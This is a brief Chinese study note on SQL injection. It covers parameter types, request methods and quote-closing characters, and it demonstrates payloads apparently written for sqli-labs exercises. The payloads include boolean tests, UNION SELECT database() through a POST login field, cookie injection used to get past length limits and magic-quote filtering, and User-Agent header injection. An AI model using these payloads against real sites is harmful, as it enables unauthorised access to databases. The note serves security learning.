目录
1.知识点
#简要明确参数类型
数字,字符,搜索,JSON等
数字可以直接加在sql中
字符就要通过单双引号接入sql语句中<闭合字符串>
#简要明确请求方法
GET, POST, COOKIE, REQUEST, HTTP头等
(request全部接受)
其中SQI语句干扰符号: ', ", %, ), } 等,具体需看写法 '"]})可以作为默认测试写法
JSON数据形式
curl -X POST https://api.zoomeye.org/user/login -d { "username": "foo@bar.com", "password": "foobar" }
2.演示实例
#考虑单引号,双引号闭合问题--sqli5,6
?id=1 and1=1--不显示
?id=1' and '1'='1
?id=1' and '1'='2--报错
# 用post提交数据--sqli11
burpsuite抓包--也可在burp改包
uname=admin' and 1=2 union select 1,2#&password=admin&submit=Submit
uname=admin' and 1=2 union select database(),2#&password=admin&submit=Submit
#cookie--sqli20
通过源代码发现,对于提交内容,有长度限制和魔术引号过滤,这时候可以考虑cookie注入,绕过防护
Cookie:uname=admin' and 1=1 union select database(),2,3#--爆库
#server
HTTP_USE_AGENT:接受浏览器信息
在burp的User-Agent改包即可注入成功